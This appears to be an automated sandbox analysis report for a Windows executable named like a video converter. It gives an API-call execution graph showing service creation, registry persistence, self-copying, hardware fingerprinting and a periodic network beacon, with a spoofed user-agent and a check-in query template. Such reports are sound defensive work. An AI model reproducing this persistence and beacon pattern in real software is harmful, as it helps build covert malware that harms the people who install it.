                                                                                                      execution_graph 61764 402a20 GetVersion 61788 403b64 HeapCreate 61764->61788 61766 402a7f 61767 402a84 61766->61767 61768 402a8c 61766->61768 61863 402b3b 8 API calls 61767->61863 61800 403844 61768->61800 61772 402a94 GetCommandLineA 61814 403712 61772->61814 61776 402aae 61846 40340c 61776->61846 61778 402ab3 61779 402ab8 GetStartupInfoA 61778->61779 61859 4033b4 61779->61859 61781 402aca GetModuleHandleA 61783 402aee 61781->61783 61864 40315b GetCurrentProcess TerminateProcess ExitProcess 61783->61864 61785 402af7 61865 403230 UnhandledExceptionFilter 61785->61865 61787 402b08 61789 403b84 61788->61789 61790 403bba 61788->61790 61866 403a1c 19 API calls 61789->61866 61790->61766 61792 403b89 61793 403ba0 61792->61793 61794 403b93 61792->61794 61796 403bbd 61793->61796 61868 40478c HeapAlloc VirtualAlloc VirtualAlloc VirtualFree HeapFree 61793->61868 61867 403f3b HeapAlloc 61794->61867 61796->61766 61797 403b9d 61797->61796 61799 403bae HeapDestroy 61797->61799 61799->61790 61869 402b5f 61800->61869 61803 403863 GetStartupInfoA 61810 403974 61803->61810 61813 4038af 61803->61813 61806 40399b GetStdHandle 61809 4039a9 GetFileType 61806->61809 61806->61810 61807 4039db SetHandleCount 61807->61772 61808 402b5f 12 API calls 61808->61813 61809->61810 61810->61806 61810->61807 61811 403920 61811->61810 61812 403942 GetFileType 61811->61812 61812->61811 61813->61808 61813->61810 61813->61811 61815 403760 61814->61815 61816 40372d GetEnvironmentStringsW 61814->61816 61817 403735 61815->61817 61818 403751 61815->61818 61816->61817 61819 403741 GetEnvironmentStrings 61816->61819 61821 403779 WideCharToMultiByte 61817->61821 61822 40376d GetEnvironmentStringsW 61817->61822 61820 402aa4 61818->61820 61823 4037f3 GetEnvironmentStrings 61818->61823 61824 4037ff 61818->61824 61819->61818 61819->61820 61837 4034c5 61820->61837 61826 4037ad 61821->61826 61827 4037df FreeEnvironmentStringsW 61821->61827 61822->61820 61822->61821 61823->61820 61823->61824 61828 402b5f 12 API calls 61824->61828 61829 402b5f 12 API calls 61826->61829 61827->61820 61835 40381a 61828->61835 61830 4037b3 61829->61830 61830->61827 61831 4037bc WideCharToMultiByte 61830->61831 61833 4037d6 61831->61833 61834 4037cd 61831->61834 61832 403830 FreeEnvironmentStringsA 61832->61820 61833->61827 61878 402c11 61834->61878 61835->61832 61838 4034d7 61837->61838 61839 4034dc GetModuleFileNameA 61837->61839 61891 405d24 19 API calls 61838->61891 61841 4034ff 61839->61841 61842 402b5f 12 API calls 61841->61842 61843 403520 61842->61843 61844 403530 61843->61844 61892 402b16 7 API calls 61843->61892 61844->61776 61847 403419 61846->61847 61849 40341e 61846->61849 61893 405d24 19 API calls 61847->61893 61850 402b5f 12 API calls 61849->61850 61851 40344b 61850->61851 61858 40345f 61851->61858 61894 402b16 7 API calls 61851->61894 61852 4034a2 61854 402c11 7 API calls 61852->61854 61855 4034ae 61854->61855 61855->61778 61856 402b5f 12 API calls 61856->61858 61858->61852 61858->61856 61895 402b16 7 API calls 61858->61895 61860 4033bd 61859->61860 61862 4033c2 61859->61862 61896 405d24 19 API calls 61860->61896 61862->61781 61864->61785 61865->61787 61866->61792 61867->61797 61868->61797 61873 402b71 61869->61873 61872 402b16 7 API calls 61872->61803 61874 402b6e 61873->61874 61876 402b78 61873->61876 61874->61803 61874->61872 61876->61874 61877 402b9d 12 API calls 61876->61877 61877->61876 61879 402c39 61878->61879 61880 402c1d 61878->61880 61879->61833 61881 402c27 61880->61881 61882 402c3d 61880->61882 61884 402c69 HeapFree 61881->61884 61885 402c33 61881->61885 61883 402c68 61882->61883 61887 402c57 61882->61887 61883->61884 61884->61879 61889 403fae VirtualFree VirtualFree HeapFree 61885->61889 61890 404a3f VirtualFree HeapFree VirtualFree 61887->61890 61889->61879 61890->61879 61891->61839 61892->61844 61893->61849 61894->61858 61895->61858 61896->61862 61386 4022c1 LoadLibraryExA 61387 4021e6 61386->61387 61387->61386 61388 401e02 CreateDirectoryA 61389 401e0d 61388->61389 61897 2d5d572 61898 2d5d589 ReadFile 61897->61898 61900 2dafffd 61898->61900 61900->61900 61901 4022e8 61902 40d418 OpenSCManagerA 61901->61902 61903 402380 61902->61903 61904 40d429 61902->61904 61903->61902 61905 401f2b 61906 401f30 61905->61906 61907 401ec9 RegOpenKeyExA 61905->61907 61909 40d470 61907->61909 61390 2d25e5f RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 61461 2d242c7 61390->61461 61392 2d25ecc GetTickCount 61393 2d259fa 59 API calls 61392->61393 61394 2d25ee9 GetVersionExA 61393->61394 61395 2d25f2a _memset 61394->61395 61396 2d31fbc _malloc 59 API calls 61395->61396 61397 2d25f37 61396->61397 61398 2d31fbc _malloc 59 API calls 61397->61398 61399 2d25f47 61398->61399 61400 2d31fbc _malloc 59 API calls 61399->61400 61401 2d25f52 61400->61401 61402 2d31fbc _malloc 59 API calls 61401->61402 61403 2d25f5d 61402->61403 61404 2d31fbc _malloc 59 API calls 61403->61404 61405 2d25f68 61404->61405 61406 2d31fbc _malloc 59 API calls 61405->61406 61407 2d25f73 61406->61407 61408 2d31fbc _malloc 59 API calls 61407->61408 61409 2d25f7e 61408->61409 61410 2d31fbc _malloc 59 API calls 61409->61410 61411 2d25f8a 6 API calls 61410->61411 61412 2d25fd7 _memset 61411->61412 61413 2d25ff0 RtlEnterCriticalSection RtlLeaveCriticalSection 61412->61413 61414 2d31fbc _malloc 59 API calls 61413->61414 61415 2d2602c 61414->61415 61416 2d31fbc _malloc 59 API calls 61415->61416 61417 2d2603a 61416->61417 61418 2d31fbc _malloc 59 API calls 61417->61418 61419 2d26041 61418->61419 61420 2d31fbc _malloc 59 API calls 61419->61420 61421 2d26062 QueryPerformanceCounter Sleep 61420->61421 61422 2d31fbc _malloc 59 API calls 61421->61422 61423 2d26088 61422->61423 61424 2d31fbc _malloc 59 API calls 61423->61424 61456 2d26098 _memset 61424->61456 61425 2d2610b RtlEnterCriticalSection RtlLeaveCriticalSection 61425->61456 61426 2d26105 Sleep 61426->61425 61427 2d26266 61428 2d2649f RtlEnterCriticalSection RtlLeaveCriticalSection 61429 2d3134c 66 API calls 61428->61429 61429->61456 61430 2d3134c 66 API calls 61430->61456 61431 2d31fbc _malloc 59 API calls 61432 2d26541 RtlEnterCriticalSection RtlLeaveCriticalSection 61431->61432 61432->61456 61433 2d267f8 RtlEnterCriticalSection RtlLeaveCriticalSection 61433->61456 61434 2d25c12 59 API calls 61434->61456 61435 2d31428 _sprintf 84 API calls 61435->61456 61436 2d21ba7 284 API calls 61436->61456 61437 2d2695d RtlEnterCriticalSection 61438 2d2698a RtlLeaveCriticalSection 61437->61438 61437->61456 61440 2d23c67 72 API calls 61438->61440 61439 2d31fbc _malloc 59 API calls 61439->61456 61440->61456 61441 2d23d7e 64 API calls 61441->61456 61442 2d27340 89 API calls 61442->61456 61443 2d28008 88 API calls 61443->61456 61444 2d31f84 _free 59 API calls 61444->61456 61445 2d325f6 65 API calls _strtok 61445->61456 61446 2d2972a 73 API calls 61446->61456 61447 2d327c5 _Allocate 60 API calls 61447->61456 61448 2d273ef 71 API calls 61448->61456 61449 2d31860 _swscanf 59 API calls 61449->61456 61450 2d233b2 86 API calls 61450->61456 61451 2d2873c 284 API calls 61451->61456 61452 2d29854 60 API calls 61452->61456 61453 2d25119 103 API calls 61453->61456 61454 2d2c11c 73 API calls 61454->61456 61455 2d29c14 284 API calls 61455->61456 61456->61425 61456->61426 61456->61427 61456->61428 61456->61430 61456->61431 61456->61433 61456->61434 61456->61435 61456->61436 61456->61437 61456->61438 61456->61439 61456->61441 61456->61442 61456->61443 61456->61444 61456->61445 61456->61446 61456->61447 61456->61448 61456->61449 61456->61450 61456->61451 61456->61452 61456->61453 61456->61454 61456->61455 61457 2d26775 Sleep 61456->61457 61459 2d26770 shared_ptr 61456->61459 61458 2d30900 GetProcessHeap HeapFree 61457->61458 61458->61459 61459->61456 61459->61457 61460 2d24100 GetProcessHeap HeapFree 61459->61460 61460->61459 61462 401dcd 61463 402149 61462->61463 61464 40d8c0 GetStartupInfoA 61463->61464 61464->61463 61465 40178d 61469 2d32988 61465->61469 61466 40178f Sleep 61470 2d32991 61469->61470 61471 2d32996 61469->61471 61483 2d3918c GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 61470->61483 61475 2d329ab 61471->61475 61474 2d329a4 61474->61466 61476 2d329b7 __close 61475->61476 61479 2d32a05 ___DllMainCRTStartup 61476->61479 61482 2d32a62 __close 61476->61482 61484 2d32816 61476->61484 61478 2d32a3f 61480 2d32816 __CRT_INIT@12 138 API calls 61478->61480 61478->61482 61479->61478 61481 2d32816 __CRT_INIT@12 138 API calls 61479->61481 61479->61482 61480->61482 61481->61478 61482->61474 61483->61471 61485 2d32822 __close 61484->61485 61486 2d328a4 61485->61486 61487 2d3282a 61485->61487 61489 2d328a8 61486->61489 61490 2d3290d 61486->61490 61532 2d36e56 GetProcessHeap 61487->61532 61494 2d328c9 61489->61494 61501 2d32833 __close __CRT_INIT@12 61489->61501 61621 2d37019 59 API calls _doexit 61489->61621 61492 2d32912 61490->61492 61493 2d32970 61490->61493 61491 2d3282f 61491->61501 61533 2d34a04 61491->61533 61626 2d37d8b 61492->61626 61493->61501 61652 2d34894 59 API calls 2 library calls 61493->61652 61622 2d36ef0 61 API calls _free 61494->61622 61499 2d3291d 61499->61501 61629 2d3762a 61499->61629 61501->61479 61502 2d3283f __RTC_Initialize 61502->61501 61510 2d3284f GetCommandLineA 61502->61510 61503 2d328ce 61504 2d328df __CRT_INIT@12 61503->61504 61623 2d38e2a 60 API calls _free 61503->61623 61625 2d328f8 62 API calls __mtterm 61504->61625 61509 2d328da 61624 2d34a7a 62 API calls 2 library calls 61509->61624 61554 2d39228 GetEnvironmentStringsW 61510->61554 61514 2d32946 61516 2d32964 61514->61516 61517 2d3294c 61514->61517 61646 2d31f84 61516->61646 61636 2d34951 61517->61636 61521 2d32954 GetCurrentThreadId 61521->61501 61522 2d32869 61523 2d3286d 61522->61523 61586 2d38e7c 61522->61586 61619 2d34a7a 62 API calls 2 library calls 61523->61619 61527 2d3288d 61527->61501 61620 2d38e2a 60 API calls _free 61527->61620 61532->61491 61653 2d370c0 36 API calls 2 library calls 61533->61653 61535 2d34a09 61654 2d375dc InitializeCriticalSectionAndSpinCount __ioinit 61535->61654 61537 2d34a0e 61538 2d34a12 61537->61538 61656 2d37d4e TlsAlloc 61537->61656 61655 2d34a7a 62 API calls 2 library calls 61538->61655 61541 2d34a17 61541->61502 61542 2d34a24 61542->61538 61543 2d34a2f 61542->61543 61544 2d3762a __calloc_crt 59 API calls 61543->61544 61545 2d34a3c 61544->61545 61546 2d34a71 61545->61546 61657 2d37daa TlsSetValue 61545->61657 61658 2d34a7a 62 API calls 2 library calls 61546->61658 61549 2d34a50 61549->61546 61551 2d34a56 61549->61551 61550 2d34a76 61550->61502 61552 2d34951 __initptd 59 API calls 61551->61552 61553 2d34a5e GetCurrentThreadId 61552->61553 61553->61502 61555 2d3285f 61554->61555 61556 2d3923b WideCharToMultiByte 61554->61556 61567 2d38b76 61555->61567 61558 2d392a5 FreeEnvironmentStringsW 61556->61558 61559 2d3926e 61556->61559 61558->61555 61659 2d37672 59 API calls 2 library calls 61559->61659 61561 2d39274 61561->61558 61562 2d3927b WideCharToMultiByte 61561->61562 61563 2d39291 61562->61563 61564 2d3929a FreeEnvironmentStringsW 61562->61564 61565 2d31f84 _free 59 API calls 61563->61565 61564->61555 61566 2d39297 61565->61566 61566->61564 61568 2d38b82 __close 61567->61568 61660 2d374ab 61568->61660 61570 2d38b89 61571 2d3762a __calloc_crt 59 API calls 61570->61571 61573 2d38b9a 61571->61573 61572 2d38c05 GetStartupInfoW 61580 2d38c1a 61572->61580 61583 2d38d49 61572->61583 61573->61572 61574 2d38ba5 __close @_EH4_CallFilterFunc@8 61573->61574 61574->61522 61575 2d38e11 61669 2d38e21 RtlLeaveCriticalSection _doexit 61575->61669 61577 2d3762a __calloc_crt 59 API calls 61577->61580 61578 2d38d96 GetStdHandle 61578->61583 61579 2d38da9 GetFileType 61579->61583 61580->61577 61581 2d38c68 61580->61581 61580->61583 61582 2d38c9c GetFileType 61581->61582 61581->61583 61667 2d37dcc InitializeCriticalSectionAndSpinCount 61581->61667 61582->61581 61583->61575 61583->61578 61583->61579 61668 2d37dcc InitializeCriticalSectionAndSpinCount 61583->61668 61587 2d38e8a 61586->61587 61588 2d38e8f GetModuleFileNameA 61586->61588 61678 2d33efa 71 API calls __setmbcp 61587->61678 61590 2d38ebc 61588->61590 61672 2d38f2f 61590->61672 61592 2d32879 61592->61527 61597 2d390ab 61592->61597 61595 2d38ef5 61595->61592 61596 2d38f2f _parse_cmdline 59 API calls 61595->61596 61596->61592 61598 2d390b4 61597->61598 61601 2d390b9 _strlen 61597->61601 61682 2d33efa 71 API calls __setmbcp 61598->61682 61600 2d32882 61600->61527 61613 2d37028 61600->61613 61601->61600 61602 2d3762a __calloc_crt 59 API calls 61601->61602 61607 2d390ef _strlen 61602->61607 61603 2d31f84 _free 59 API calls 61603->61600 61604 2d3762a __calloc_crt 59 API calls 61604->61607 61605 2d39141 61605->61603 61606 2d39168 61609 2d31f84 _free 59 API calls 61606->61609 61607->61600 61607->61604 61607->61605 61607->61606 61610 2d3917f 61607->61610 61683 2d3592c 59 API calls __close 61607->61683 61609->61600 61684 2d33b75 8 API calls 2 library calls 61610->61684 61612 2d3918b 61615 2d37034 __IsNonwritableInCurrentImage 61613->61615 61685 2d3ab8f 61615->61685 61616 2d37052 __initterm_e 61618 2d37071 _doexit __IsNonwritableInCurrentImage 61616->61618 61688 2d323b4 61616->61688 61618->61527 61619->61501 61620->61523 61621->61494 61622->61503 61623->61509 61624->61504 61625->61501 61627 2d37da2 TlsGetValue 61626->61627 61628 2d37d9e 61626->61628 61627->61499 61628->61499 61630 2d37631 61629->61630 61632 2d3292e 61630->61632 61634 2d3764f 61630->61634 61723 2d3e9b8 61630->61723 61632->61501 61635 2d37daa TlsSetValue 61632->61635 61634->61630 61634->61632 61731 2d380c5 Sleep 61634->61731 61635->61514 61637 2d3495d __close 61636->61637 61638 2d374ab __lock 59 API calls 61637->61638 61639 2d3499a 61638->61639 61734 2d349f2 61639->61734 61642 2d374ab __lock 59 API calls 61643 2d349bb ___addlocaleref 61642->61643 61737 2d349fb 61643->61737 61645 2d349e6 __close 61645->61521 61647 2d31f8d HeapFree 61646->61647 61651 2d31fb6 __dosmaperr 61646->61651 61648 2d31fa2 61647->61648 61647->61651 61742 2d34acb 59 API calls __getptd_noexit 61648->61742 61650 2d31fa8 GetLastError 61650->61651 61651->61501 61652->61501 61653->61535 61654->61537 61655->61541 61656->61542 61657->61549 61658->61550 61659->61561 61661 2d374cf RtlEnterCriticalSection 61660->61661 61662 2d374bc 61660->61662 61661->61570 61670 2d37533 59 API calls 9 library calls 61662->61670 61664 2d374c2 61664->61661 61671 2d36ffd 59 API calls 3 library calls 61664->61671 61667->61581 61668->61583 61669->61574 61670->61664 61674 2d38f51 61672->61674 61677 2d38fb5 61674->61677 61680 2d3ef96 59 API calls x_ismbbtype_l 61674->61680 61675 2d38ed2 61675->61592 61679 2d37672 59 API calls 2 library calls 61675->61679 61677->61675 61681 2d3ef96 59 API calls x_ismbbtype_l 61677->61681 61678->61588 61679->61595 61680->61674 61681->61677 61682->61601 61683->61607 61684->61612 61686 2d3ab92 RtlEncodePointer 61685->61686 61686->61686 61687 2d3abac 61686->61687 61687->61616 61691 2d322b8 61688->61691 61690 2d323bf 61690->61618 61692 2d322c4 __close 61691->61692 61699 2d37150 61692->61699 61698 2d322eb __close 61698->61690 61700 2d374ab __lock 59 API calls 61699->61700 61701 2d322cd 61700->61701 61702 2d322fc RtlDecodePointer RtlDecodePointer 61701->61702 61703 2d322d9 61702->61703 61704 2d32329 61702->61704 61713 2d322f6 61703->61713 61704->61703 61716 2d37d1d 60 API calls __close 61704->61716 61706 2d3238c RtlEncodePointer RtlEncodePointer 61706->61703 61707 2d3233b 61707->61706 61709 2d32360 61707->61709 61717 2d376b9 62 API calls 2 library calls 61707->61717 61709->61703 61711 2d3237a RtlEncodePointer 61709->61711 61718 2d376b9 62 API calls 2 library calls 61709->61718 61711->61706 61712 2d32374 61712->61703 61712->61711 61719 2d37159 61713->61719 61716->61707 61717->61709 61718->61712 61722 2d37615 RtlLeaveCriticalSection 61719->61722 61721 2d322fb 61721->61698 61722->61721 61724 2d3e9c3 61723->61724 61728 2d3e9de 61723->61728 61725 2d3e9cf 61724->61725 61724->61728 61732 2d34acb 59 API calls __getptd_noexit 61725->61732 61727 2d3e9ee RtlAllocateHeap 61727->61728 61729 2d3e9d4 61727->61729 61728->61727 61728->61729 61733 2d36e73 RtlDecodePointer 61728->61733 61729->61630 61731->61634 61732->61729 61733->61728 61740 2d37615 RtlLeaveCriticalSection 61734->61740 61736 2d349b4 61736->61642 61741 2d37615 RtlLeaveCriticalSection 61737->61741 61739 2d34a02 61739->61645 61740->61736 61741->61739 61742->61650 61910 40d76e RegSetValueExA RegCloseKey 61911 40d780 61910->61911 61743 2d61119 61744 2d71009 SHGetSpecialFolderPathA 61743->61744 61745 2d71014 61744->61745 61912 40d6f2 61915 401301 FindResourceA 61912->61915 61914 40d6f7 61916 401367 SizeofResource 61915->61916 61921 401360 61915->61921 61917 401386 LoadResource LockResource GlobalAlloc 61916->61917 61916->61921 61918 4013cc 61917->61918 61919 40141f GetTickCount 61918->61919 61922 40142a GlobalAlloc 61919->61922 61921->61914 61922->61921 61923 401ef2 CopyFileA 61924 402380 61923->61924 61925 40df0c 61924->61925 61926 40d418 OpenSCManagerA 61924->61926 61926->61924 61927 40d429 61926->61927 61746 402413 CopyFileA 61747 4021d3 61746->61747 61748 4020d3 61749 40df7f RegQueryValueExA 61748->61749 61750 40df8d 61749->61750 61752 40d3e7 61749->61752 61751 40d5c0 RegCloseKey 61751->61752 61752->61749 61752->61751 61928 401e73 61929 401e48 61928->61929 61931 401e0d 61928->61931 61930 401e53 VirtualAlloc 61929->61930 61929->61931 61753 40d195 Sleep 61932 2d70da2 61933 2d982b6 61932->61933 61936 2d2e9ac LoadLibraryA 61933->61936 61937 2d2e9d5 GetProcAddress 61936->61937 61938 2d2ea8f 61936->61938 61939 2d2ea88 FreeLibrary 61937->61939 61940 2d2e9e9 61937->61940 61939->61938 61941 2d2e9fb GetAdaptersInfo 61940->61941 61942 2d2ea83 61940->61942 61944 2d327c5 61940->61944 61941->61940 61942->61939 61947 2d327cd 61944->61947 61946 2d327e7 61946->61940 61947->61946 61949 2d327eb std::exception::exception 61947->61949 61952 2d31fbc 61947->61952 61969 2d36e73 RtlDecodePointer 61947->61969 61970 2d331ca 61949->61970 61951 2d32815 61953 2d32037 61952->61953 61959 2d31fc8 61952->61959 61979 2d36e73 RtlDecodePointer 61953->61979 61955 2d3203d 61980 2d34acb 59 API calls __getptd_noexit 61955->61980 61956 2d31fd3 61956->61959 61973 2d37291 59 API calls 2 library calls 61956->61973 61974 2d372ee 59 API calls 8 library calls 61956->61974 61975 2d36eda GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 61956->61975 61959->61956 61960 2d31ffb RtlAllocateHeap 61959->61960 61963 2d32023 61959->61963 61967 2d32021 61959->61967 61976 2d36e73 RtlDecodePointer 61959->61976 61960->61959 61961 2d3202f 61960->61961 61961->61947 61977 2d34acb 59 API calls __getptd_noexit 61963->61977 61978 2d34acb 59 API calls __getptd_noexit 61967->61978 61969->61947 61972 2d331e9 RaiseException 61970->61972 61972->61951 61973->61956 61974->61956 61976->61959 61977->61967 61978->61961 61979->61955 61980->61961 61981 40d639 61984 40d1ad 61981->61984 61982 40d812 CreateServiceA 61983 40d820 61982->61983 61982->61984 61984->61982 61985 40d25d CloseServiceHandle 61984->61985 61985->61984 61986 40d785 CloseServiceHandle 61985->61986 61987 2d2e8a8 CreateFileA 61988 2d2e9a4 61987->61988 61991 2d2e8d9 61987->61991 61989 2d2e8f1 DeviceIoControl 61989->61991 61990 2d2e99a CloseHandle 61990->61988 61991->61989 61991->61990 61992 2d2e966 GetLastError 61991->61992 61993 2d327c5 _Allocate 60 API calls 61991->61993 61992->61990 61992->61991 61993->61991 61754 40221b RegCreateKeyExA 61755 40d780 61754->61755 61994 40197c 61995 40198e 61994->61995 61996 40d842 61995->61996 61997 40d83a lstrcmpiW 61995->61997 61997->61996 61756 2d2104d 61757 2d323b4 __cinit 68 API calls 61756->61757 61758 2d21057 61757->61758 61761 2d21aa9 InterlockedIncrement 61758->61761 61762 2d21ac5 WSAStartup InterlockedExchange 61761->61762 61763 2d2105c 61761->61763 61762->61763

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 0 2d25e5f-2d260ed RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress call 2d242c7 GetTickCount call 2d259fa GetVersionExA call 2d33760 call 2d31fbc * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call 2d33760 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call 2d31fbc * 4 QueryPerformanceCounter Sleep call 2d31fbc * 2 call 2d33760 * 2 45 2d260f1-2d260f3 0->45 46 2d260f5-2d260fa 45->46 47 2d260fc-2d260fe 45->47 51 2d26105 Sleep 46->51 48 2d26100 47->48 49 2d2610b-2d26218 RtlEnterCriticalSection RtlLeaveCriticalSection 47->49 48->51 53 2d26261-2d26264 49->53 54 2d2621a-2d26260 49->54 51->49 55 2d26266-2d2626c 53->55 56 2d2628b-2d26338 53->56 54->53 60 2d26371 56->60 61 2d2633a-2d2634f 56->61 64 2d263a3 60->64 65 2d26373-2d2638a 60->65 62 2d263c3-2d263ef 61->62 63 2d26351-2d2635c 61->63 69 2d263f1-2d263f7 62->69 70 2d263ff-2d26449 62->70 68 2d263a4-2d263af 63->68 71 2d2635e-2d26360 63->71 64->68 66 2d263b3-2d263c2 65->66 67 2d2638c-2d26397 65->67 66->62 67->64 72 2d263b1-2d263b2 68->72 73 2d263fd-2d263fe 68->73 74 2d26470-2d26499 call 2d33760 call 2d2439c 69->74 75 2d263f9-2d263fb 69->75 76 2d26465-2d2646f 70->76 77 2d2644b-2d26451 70->77 72->66 73->70 74->45 86 2d2649f-2d264ca RtlEnterCriticalSection RtlLeaveCriticalSection call 2d3134c 74->86 75->73 76->45 76->74 79 2d26453-2d26455 77->79 80 2d26457-2d26464 call 2d2534d 77->80 79->76 80->76 89 2d26514-2d2652c call 2d3134c 86->89 90 2d264cc-2d264db call 2d3134c 86->90 95 2d26532-2d26534 89->95 96 2d267d3-2d267e2 call 2d3134c 89->96 90->89 97 2d264dd-2d264ec call 2d3134c 90->97 95->96 99 2d2653a-2d265e5 call 2d31fbc RtlEnterCriticalSection RtlLeaveCriticalSection call 2d33760 * 5 call 2d2439c * 2 95->99 104 2d26827-2d26836 call 2d3134c 96->104 105 2d267e4-2d267e6 96->105 97->89 107 2d264ee-2d264fd call 2d3134c 97->107 151 2d26622 99->151 152 2d265e7-2d265e9 99->152 116 2d2684b-2d2685a call 2d3134c 104->116 117 2d26838-2d26841 call 2d25c12 call 2d25d20 104->117 105->104 108 2d267e8-2d26822 call 2d33760 RtlEnterCriticalSection RtlLeaveCriticalSection 105->108 107->89 118 2d264ff-2d2650e call 2d3134c 107->118 108->45 116->45 131 2d26860-2d26862 116->131 133 2d26846 117->133 118->45 118->89 131->45 134 2d26868-2d26881 call 2d2439c 131->134 133->45 134->45 140 2d26887-2d26956 call 2d31428 call 2d21ba7 134->140 149 2d26958 call 2d2143f 140->149 150 2d2695d-2d2697e RtlEnterCriticalSection 140->150 149->150 155 2d26980-2d26987 150->155 156 2d2698a-2d269f1 RtlLeaveCriticalSection call 2d23c67 call 2d23d7e call 2d27340 150->156 153 2d26626-2d26654 call 2d31fbc call 2d33760 call 2d2439c 151->153 152->151 157 2d265eb-2d265fd call 2d3134c 152->157 175 2d26656-2d26665 call 2d325f6 153->175 176 2d26695-2d2669e call 2d31f84 153->176 155->156 177 2d269f7-2d26a39 call 2d2972a 156->177 178 2d26b59-2d26b6d call 2d28008 156->178 157->151 166 2d265ff-2d26620 call 2d2439c 157->166 166->153 175->176 189 2d26667 175->189 187 2d267c1-2d267ce 176->187 188 2d266a4-2d266bc call 2d327c5 176->188 190 2d26b23-2d26b34 call 2d273ef 177->190 191 2d26a3f-2d26a46 177->191 178->45 187->45 201 2d266c8 188->201 202 2d266be-2d266c6 call 2d2873c 188->202 194 2d2666c-2d2667e call 2d31860 189->194 199 2d26b39-2d26b54 call 2d233b2 190->199 192 2d26a49-2d26a4e 191->192 192->192 196 2d26a50-2d26a95 call 2d2972a 192->196 208 2d26683-2d26693 call 2d325f6 194->208 209 2d26680 194->209 196->190 211 2d26a9b-2d26aa1 196->211 199->178 207 2d266ca-2d26758 call 2d29854 call 2d23863 call 2d25119 call 2d23863 call 2d29afa call 2d29c14 201->207 202->207 232 2d2675d-2d2676e 207->232 208->176 208->194 209->208 215 2d26aa4-2d26aa9 211->215 215->215 218 2d26aab-2d26ae6 call 2d2972a 215->218 218->190 224 2d26ae8-2d26b1c call 2d2c11c 218->224 228 2d26b21-2d26b22 224->228 228->190 233 2d26770 call 2d2380b 232->233 234 2d26775-2d267a0 Sleep call 2d30900 232->234 233->234 238 2d267a2-2d267ab call 2d24100 234->238 239 2d267ac-2d267ba 234->239 238->239 239->187 241 2d267bc call 2d2380b 239->241 241->187
                                                                                                      APIs
                                                                                                      • RtlInitializeCriticalSection.NTDLL(02D54FD0), ref: 02D25E93
                                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02D25EAA
                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 02D25EB3
                                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02D25EC2
                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 02D25EC5
                                                                                                      • GetTickCount.KERNEL32 ref: 02D25ED9
                                                                                                        • Part of subcall function 02D259FA: _malloc.LIBCMT ref: 02D25A08
                                                                                                      • GetVersionExA.KERNEL32(02D54E20), ref: 02D25F06
                                                                                                      • _memset.LIBCMT ref: 02D25F25
                                                                                                      • _malloc.LIBCMT ref: 02D25F32
                                                                                                        • Part of subcall function 02D31FBC: __FF_MSGBANNER.LIBCMT ref: 02D31FD3
                                                                                                        • Part of subcall function 02D31FBC: __NMSG_WRITE.LIBCMT ref: 02D31FDA
                                                                                                        • Part of subcall function 02D31FBC: RtlAllocateHeap.NTDLL(00700000,00000000,00000001), ref: 02D31FFF
                                                                                                      • _malloc.LIBCMT ref: 02D25F42
                                                                                                      • _malloc.LIBCMT ref: 02D25F4D
                                                                                                      • _malloc.LIBCMT ref: 02D25F58
                                                                                                      • _malloc.LIBCMT ref: 02D25F63
                                                                                                      • _malloc.LIBCMT ref: 02D25F6E
                                                                                                      • _malloc.LIBCMT ref: 02D25F79
                                                                                                      • _malloc.LIBCMT ref: 02D25F85
                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02D25F9C
                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02D25FA5
                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D25FB1
                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02D25FB4
                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D25FBF
                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02D25FC2
                                                                                                      • _memset.LIBCMT ref: 02D25FD2
                                                                                                      • _memset.LIBCMT ref: 02D25FDE
                                                                                                      • _memset.LIBCMT ref: 02D25FEB
                                                                                                      • RtlEnterCriticalSection.NTDLL(02D54FD0), ref: 02D25FF9
                                                                                                      • RtlLeaveCriticalSection.NTDLL(02D54FD0), ref: 02D26006
                                                                                                      • _malloc.LIBCMT ref: 02D26027
                                                                                                      • _malloc.LIBCMT ref: 02D26035
                                                                                                      • _malloc.LIBCMT ref: 02D2603C
                                                                                                      • _malloc.LIBCMT ref: 02D2605D
                                                                                                      • QueryPerformanceCounter.KERNEL32(00000200), ref: 02D26069
                                                                                                      • Sleep.KERNELBASE(00000000), ref: 02D26077
                                                                                                      • _malloc.LIBCMT ref: 02D26083
                                                                                                      • _malloc.LIBCMT ref: 02D26093
                                                                                                      • _memset.LIBCMT ref: 02D260A8
                                                                                                      • _memset.LIBCMT ref: 02D260B8
                                                                                                      • Sleep.KERNELBASE(0000EA60), ref: 02D26105
                                                                                                      • RtlEnterCriticalSection.NTDLL(02D54FD0), ref: 02D26110
                                                                                                      • RtlLeaveCriticalSection.NTDLL(02D54FD0), ref: 02D26121
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D21000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2d21000_videoconverterfactory.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: _malloc$Heap$_memset$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                                                                      • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$gpt=%.8x&advizor=%d&box=%d&hp=%x&lp=%x&line=%d&os=%d.%d.%04d&flag=%d&itd=%d$ntdll.dll$sprintf$strcat
                                                                                                      • API String ID: 1856495841-1038016512
